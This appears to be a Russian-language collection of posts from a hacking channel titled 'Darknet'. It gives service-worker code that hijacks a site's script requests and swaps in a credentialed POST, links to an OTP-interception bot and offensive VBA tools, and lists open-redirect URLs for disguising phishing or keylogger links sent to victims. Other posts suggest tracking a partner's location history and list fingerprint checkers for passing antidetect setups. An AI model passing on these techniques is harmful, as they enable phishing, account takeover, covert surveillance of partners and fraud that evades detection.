Darknet

Service Worker - это скрипт, запускаемый браузером в фоновом процессе. Думаю, еще не самая используемая технология пентестерами, а ведь с помощью нее можно придумать какую-нибудь интересную эксплуатацию уязвимостей. Большинство использует как кэш в твоем браузере, а кто-то, наверное, всякие гадости делает?

Чтобы посмотреть, что у тебя крутится-вертится, нужно открыть chrome://serviceworker-internals/. Если ты активный пользователь интернета, будешь неприятно удивлен

Например, вот логика простого перехватчика запросов, которые заканчиваются на js. Если происходит fetch (а это даже просто подключаемый js на страницу с помощью тега , то вернется alert().

Надо разместить куда-то serviceworker.js (на имя пофиг).


self.addEventListener('fetch', event => {
    if(event.request.url.endsWith('.js'))
       event.respondWith(new Response('alert()'));
});


И зарегать его:
navigator.serviceWorker.register(‘serviceworker.js')

При следующем посещении все js’ки будут alert’тить.

А вот если какой-то контент доступен только с помощью метода POST и тебе его нужно оттуда подгрузить js, то можно просто заменить любой запрос на странице (назовем его intercept), на наше событие:

self.addEventListener('fetch', event => {
    const url = '/api/user';
    if(event.request.url.endsWith('/intercept'))
    event.respondWith(fetch(url, {
        method  : 'POST',
        mode    : 'no-cors',
        credentials: 'include'
    }));
});

И вместо , будет содержимое POST-запроса

>

​Как посмотреть карту всех своих перемещений

Юваль Ной Харари, израильский историк и футуролог, написал книгу «21 урок для 21 столетия». Google там сравнивается с испанской инквизицией и КГБ. Компания собирает огромные массивы личных данных и попадает в скандал каждый год: в одном только 2018-ом пострадало 52,5 миллиона пользователей. Журналисты, эксперты и отдельные страны ЕС давно заклеймили Google Chrome как шпионское ПО.

Шлёшь на*** авторитетов? Не осуждаем. Но своим-то глазам веришь? Location History Visualiser — вот что гарантированно убедит даже самых прожённых скептиков. Этот сервис работает с данными из истории местоположений Google TakeOut. Вот есть карта, и на ней показана каждая улочка, по которой ты когда-либо проходил с включённой передачей геолокации — так это работает.

Инструкция: переходим в https://takeout.google.com/settings/takeout → выбираем пункт «История местоположений» → нажимаем «Создать экспорт» → распаковываем данные → загружаем LocationHistory.json на сайт. Готово!

Так же ревнивцы могут отследить с помощью этого лайфхака историю перемещений своей второй половинки ✌️

Парни, не ведитесь на типов которые за бабки "перехватывают" OTP
Держите фри: https://github.com/Ross1337/SMSBotBypass

github.com/S3cur3Th1sSh1t/OffensiveVBA большой список VBA

​4 способа скрытия фишинговых ссылок

Салют, бандиты. Предположим вы решили засунуть логгер жертве или фишнуть ее аккаунт, но ссылка выглядит слишком палевно. Решение есть — просто замаскируем ее под что-то привычное.

1. https://vk.com/away.php?photo435_33&to=ССЫЛКА_НА_ВАШ_САЙТ;
2. https://www.youtube.com/redirect?q=ССЫЛКА_НА_ВАШ_САЙТ;
3. https://www.google.com/url?q=ССЫЛКА_НА_ВАШ_САЙТ;
4. https://m.ok.ru/dk?__dp=y&_prevCmd=....cmd=outLinkWarning&st.rfn=ССЫЛКА_НА_ВАШ_САЙТ;

Так просто ✌️

Сделал подборку чекеров, у кого есть важные чекеры, которыми стоит дополнить список - присылайте мне.

https://pixelscan.net (начинайте проверку с него)
http://vektort13.space (не принимайте близко к сердцу)
https://panopticlick.eff.org (топ чекер, если не знаете как им пользоваться - смотрите вебинары)
https://amiunique.org (тоже топ, смотрите вебинары)
https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/ (проверит качество вашего IP)
https://www.aida64.com/downloads (программа, которая чекает железо)
https://uniquemachine.org
https://www.deviceinfo.me
https://browserleaks.com
https://privacy.net
https://whoer.net/
https://proxy-checker.net
https://whatleaks.com
https://amiunique.org
http://www.f.vision
https://fingerprintjs.com (базовый уровень, его обязан проходить любой антидетект)
https://ja3er.com
https://audiofingerprint.openwpm.com
https://webbrowsertools.com
https://antcpt.com/eng/information/demo-form/recaptcha-3-test-score.html (капча скор)
https://www.perfect-privacy.com/en/tests/dns-leaktest
http://getipintel.com/
https://scamalytics.com/ip
http://www.ionworx.com/machineid.html (проверяет использование виртуалки)
https://github.com/a0rtega/pafish (легендарный Pafish, который вы обязательно должны проходить минимум на 50%)
https://github.com/LordNoteworthy/al-khaser (аналог Pafish)
https://webcamtests.com (чекер вебкамеры)
https://www.spamhaus.org/lookup/ (проверьте свой IP в базах Spamhaus)
https://lampyre.io (сервис проверки репутации)
http://dnscookie.com (проверь свои днс куки)
https://www.shodan.io (покажет открытые порты)
https://whatismyiplookup.com/ (есть внутренний FraudScore, показывает гео на карте)